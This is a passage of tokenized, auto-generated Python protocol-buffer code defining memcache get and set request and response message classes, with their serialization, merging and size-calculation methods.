putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . 
expires_in_seconds_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_key_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> if ( self . has_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . flags_ ) <EOL> if ( self . has_cas_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put64 ( self . cas_id_ ) <EOL> if ( self . has_expires_in_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . expires_in_seconds_ ) <EOL> def TryMerge ( self , d ) : <EOL> while <NUM_LIT:1> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:12> : break <EOL> if tt == <NUM_LIT> : <EOL> self . set_key ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_value ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_flags ( d . get32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_cas_id ( d . get64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_expires_in_seconds ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_key_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . key_ ) ) <EOL> if self . has_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . value_ ) ) <EOL> if self . has_flags_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed32 ( self . flags_ ) ) <EOL> if self . has_cas_id_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed64 ( self . cas_id_ ) ) <EOL> if self . has_expires_in_seconds_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . 
expires_in_seconds_ ) ) <EOL> return res <EOL> class MemcacheGetResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> self . item_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def item_size ( self ) : return len ( self . item_ ) <EOL> def item_list ( self ) : return self . item_ <EOL> def item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def mutable_item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def add_item ( self ) : <EOL> x = MemcacheGetResponse_Item ( ) <EOL> self . item_ . append ( x ) <EOL> return x <EOL> def clear_item ( self ) : <EOL> self . item_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . item_size ( ) ) : self . add_item ( ) . CopyFrom ( x . item ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . item_ ) != len ( x . item_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . item_ , x . item_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . item_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSize ( ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSizePartial ( ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_item ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputUnchecked ( out ) <EOL> out . 
putVarInt32 ( <NUM_LIT:12> ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputPartial ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:11> : <EOL> self . add_item ( ) . TryMerge ( d ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . item_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kItemGroup = <NUM_LIT:1> <EOL> kItemkey = <NUM_LIT:2> <EOL> kItemvalue = <NUM_LIT:3> <EOL> kItemflags = <NUM_LIT:4> <EOL> kItemcas_id = <NUM_LIT:5> <EOL> kItemexpires_in_seconds = <NUM_LIT:6> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT:key>" , <EOL> <NUM_LIT:3> : "<STR_LIT:value>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> } , <NUM_LIT:6> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STARTGROUP , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . 
FLOAT , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . DOUBLE , <EOL> <NUM_LIT:6> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:6> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheSetRequest_Item ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_key_ = <NUM_LIT:0> <EOL> key_ = "<STR_LIT>" <EOL> has_value_ = <NUM_LIT:0> <EOL> value_ = "<STR_LIT>" <EOL> has_flags_ = <NUM_LIT:0> <EOL> flags_ = <NUM_LIT:0> <EOL> has_set_policy_ = <NUM_LIT:0> <EOL> set_policy_ = <NUM_LIT:1> <EOL> has_expiration_time_ = <NUM_LIT:0> <EOL> expiration_time_ = <NUM_LIT:0> <EOL> has_cas_id_ = <NUM_LIT:0> <EOL> cas_id_ = <NUM_LIT:0> <EOL> has_for_cas_ = <NUM_LIT:0> <EOL> for_cas_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def key ( self ) : return self . key_ <EOL> def set_key ( self , x ) : <EOL> self . has_key_ = <NUM_LIT:1> <EOL> self . key_ = x <EOL> def clear_key ( self ) : <EOL> if self . has_key_ : <EOL> self . has_key_ = <NUM_LIT:0> <EOL> self . key_ = "<STR_LIT>" <EOL> def has_key ( self ) : return self . has_key_ <EOL> def value ( self ) : return self . value_ <EOL> def set_value ( self , x ) : <EOL> self . has_value_ = <NUM_LIT:1> <EOL> self . value_ = x <EOL> def clear_value ( self ) : <EOL> if self . has_value_ : <EOL> self . has_value_ = <NUM_LIT:0> <EOL> self . value_ = "<STR_LIT>" <EOL> def has_value ( self ) : return self . has_value_ <EOL> def flags ( self ) : return self . flags_ <EOL> def set_flags ( self , x ) : <EOL> self . has_flags_ = <NUM_LIT:1> <EOL> self . flags_ = x <EOL> def clear_flags ( self ) : <EOL> if self . has_flags_ : <EOL> self . has_flags_ = <NUM_LIT:0> <EOL> self . flags_ = <NUM_LIT:0> <EOL> def has_flags ( self ) : return self . has_flags_ <EOL> def set_policy ( self ) : return self . 
set_policy_ <EOL> def set_set_policy ( self , x ) : <EOL> self . has_set_policy_ = <NUM_LIT:1> <EOL> self . set_policy_ = x <EOL> def clear_set_policy ( self ) : <EOL> if self . has_set_policy_ : <EOL> self . has_set_policy_ = <NUM_LIT:0> <EOL> self . set_policy_ = <NUM_LIT:1> <EOL> def has_set_policy ( self ) : return self . has_set_policy_ <EOL> def expiration_time ( self ) : return self . expiration_time_ <EOL> def set_expiration_time ( self , x ) : <EOL> self . has_expiration_time_ = <NUM_LIT:1> <EOL> self . expiration_time_ = x <EOL> def clear_expiration_time ( self ) : <EOL> if self . has_expiration_time_ : <EOL> self . has_expiration_time_ = <NUM_LIT:0> <EOL> self . expiration_time_ = <NUM_LIT:0> <EOL> def has_expiration_time ( self ) : return self . has_expiration_time_ <EOL> def cas_id ( self ) : return self . cas_id_ <EOL> def set_cas_id ( self , x ) : <EOL> self . has_cas_id_ = <NUM_LIT:1> <EOL> self . cas_id_ = x <EOL> def clear_cas_id ( self ) : <EOL> if self . has_cas_id_ : <EOL> self . has_cas_id_ = <NUM_LIT:0> <EOL> self . cas_id_ = <NUM_LIT:0> <EOL> def has_cas_id ( self ) : return self . has_cas_id_ <EOL> def for_cas ( self ) : return self . for_cas_ <EOL> def set_for_cas ( self , x ) : <EOL> self . has_for_cas_ = <NUM_LIT:1> <EOL> self . for_cas_ = x <EOL> def clear_for_cas ( self ) : <EOL> if self . has_for_cas_ : <EOL> self . has_for_cas_ = <NUM_LIT:0> <EOL> self . for_cas_ = <NUM_LIT:0> <EOL> def has_for_cas ( self ) : return self . has_for_cas_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_key ( ) ) : self . set_key ( x . key ( ) ) <EOL> if ( x . has_value ( ) ) : self . set_value ( x . value ( ) ) <EOL> if ( x . has_flags ( ) ) : self . set_flags ( x . flags ( ) ) <EOL> if ( x . has_set_policy ( ) ) : self . set_set_policy ( x . set_policy ( ) ) <EOL> if ( x . has_expiration_time ( ) ) : self . set_expiration_time ( x . expiration_time ( ) ) <EOL> if ( x . has_cas_id ( ) ) : self . set_cas_id ( x . 
cas_id ( ) ) <EOL> if ( x . has_for_cas ( ) ) : self . set_for_cas ( x . for_cas ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_key_ != x . has_key_ : return <NUM_LIT:0> <EOL> if self . has_key_ and self . key_ != x . key_ : return <NUM_LIT:0> <EOL> if self . has_value_ != x . has_value_ : return <NUM_LIT:0> <EOL> if self . has_value_ and self . value_ != x . value_ : return <NUM_LIT:0> <EOL> if self . has_flags_ != x . has_flags_ : return <NUM_LIT:0> <EOL> if self . has_flags_ and self . flags_ != x . flags_ : return <NUM_LIT:0> <EOL> if self . has_set_policy_ != x . has_set_policy_ : return <NUM_LIT:0> <EOL> if self . has_set_policy_ and self . set_policy_ != x . set_policy_ : return <NUM_LIT:0> <EOL> if self . has_expiration_time_ != x . has_expiration_time_ : return <NUM_LIT:0> <EOL> if self . has_expiration_time_ and self . expiration_time_ != x . expiration_time_ : return <NUM_LIT:0> <EOL> if self . has_cas_id_ != x . has_cas_id_ : return <NUM_LIT:0> <EOL> if self . has_cas_id_ and self . cas_id_ != x . cas_id_ : return <NUM_LIT:0> <EOL> if self . has_for_cas_ != x . has_for_cas_ : return <NUM_LIT:0> <EOL> if self . has_for_cas_ and self . for_cas_ != x . for_cas_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_key_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_value_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_set_policy_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . 
set_policy_ ) <EOL> if ( self . has_expiration_time_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_cas_id_ ) : n += <NUM_LIT:9> <EOL> if ( self . has_for_cas_ ) : n += <NUM_LIT:2> <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_key_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_value_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_set_policy_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . set_policy_ ) <EOL> if ( self . has_expiration_time_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_cas_id_ ) : n += <NUM_LIT:9> <EOL> if ( self . has_for_cas_ ) : n += <NUM_LIT:2> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_key ( ) <EOL> self . clear_value ( ) <EOL> self . clear_flags ( ) <EOL> self . clear_set_policy ( ) <EOL> self . clear_expiration_time ( ) <EOL> self . clear_cas_id ( ) <EOL> self . clear_for_cas ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . flags_ ) <EOL> if ( self . has_set_policy_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . set_policy_ ) <EOL> if ( self . has_expiration_time_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . expiration_time_ ) <EOL> if ( self . has_cas_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put64 ( self . cas_id_ ) <EOL> if ( self . has_for_cas_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putBoolean ( self . for_cas_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_key_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . 
putPrefixedString ( self . key_ ) <EOL> if ( self . has_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . flags_ ) <EOL> if ( self . has_set_policy_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . set_policy_ ) <EOL> if ( self . has_expiration_time_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . expiration_time_ ) <EOL> if ( self . has_cas_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put64 ( self . cas_id_ ) <EOL> if ( self . has_for_cas_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putBoolean ( self . for_cas_ ) <EOL> def TryMerge ( self , d ) : <EOL> while <NUM_LIT:1> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:12> : break <EOL> if tt == <NUM_LIT> : <EOL> self . set_key ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_value ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_flags ( d . get32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_set_policy ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_expiration_time ( d . get32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_cas_id ( d . get64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_for_cas ( d . getBoolean ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_key_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . key_ ) ) <EOL> if self . has_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . value_ ) ) <EOL> if self . has_flags_ : res += prefix + ( "<STR_LIT>" % self . 
DebugFormatFixed32 ( self . flags_ ) ) <EOL> if self . has_set_policy_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . set_policy_ ) ) <EOL> if self . has_expiration_time_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed32 ( self . expiration_time_ ) ) <EOL> if self . has_cas_id_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed64 ( self . cas_id_ ) ) <EOL> if self . has_for_cas_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatBool ( self . for_cas_ ) ) <EOL> return res <EOL> class MemcacheSetRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> SET = <NUM_LIT:1> <EOL> ADD = <NUM_LIT:2> <EOL> REPLACE = <NUM_LIT:3> <EOL> CAS = <NUM_LIT:4> <EOL> _SetPolicy_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> } <EOL> def SetPolicy_Name ( cls , x ) : return cls . _SetPolicy_NAMES . get ( x , "<STR_LIT>" ) <EOL> SetPolicy_Name = classmethod ( SetPolicy_Name ) <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . item_ = [ ] <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def item_size ( self ) : return len ( self . item_ ) <EOL> def item_list ( self ) : return self . item_ <EOL> def item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def mutable_item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def add_item ( self ) : <EOL> x = MemcacheSetRequest_Item ( ) <EOL> self . item_ . append ( x ) <EOL> return x <EOL> def clear_item ( self ) : <EOL> self . item_ = [ ] <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . 
has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . item_size ( ) ) : self . add_item ( ) . CopyFrom ( x . item ( i ) ) <EOL> if ( x . has_name_space ( ) ) : self . set_name_space ( x . name_space ( ) ) <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . item_ ) != len ( x . item_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . item_ , x . item_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_name_space_ != x . has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . item_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> if ( self . has_override_ and not self . override_ . 
IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSize ( ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSizePartial ( ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_item ( ) <EOL> self . clear_name_space ( ) <EOL> self . clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputUnchecked ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputPartial ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . 
has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:11> : <EOL> self . add_item ( ) . TryMerge ( d ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_name_space ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . item_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . 
get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kItemGroup = <NUM_LIT:1> <EOL> kItemkey = <NUM_LIT:2> <EOL> kItemvalue = <NUM_LIT:3> <EOL> kItemflags = <NUM_LIT:4> <EOL> kItemset_policy = <NUM_LIT:5> <EOL> kItemexpiration_time = <NUM_LIT:6> <EOL> kItemcas_id = <NUM_LIT:8> <EOL> kItemfor_cas = <NUM_LIT:9> <EOL> kname_space = <NUM_LIT:7> <EOL> koverride = <NUM_LIT:10> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT:key>" , <EOL> <NUM_LIT:3> : "<STR_LIT:value>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> } , <NUM_LIT:10> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STARTGROUP , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . FLOAT , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:6> : ProtocolBuffer . Encoder . FLOAT , <EOL> <NUM_LIT:7> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:8> : ProtocolBuffer . Encoder . DOUBLE , <EOL> <NUM_LIT:9> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:10> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:10> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheSetResponse ( ProtocolBuffer . 
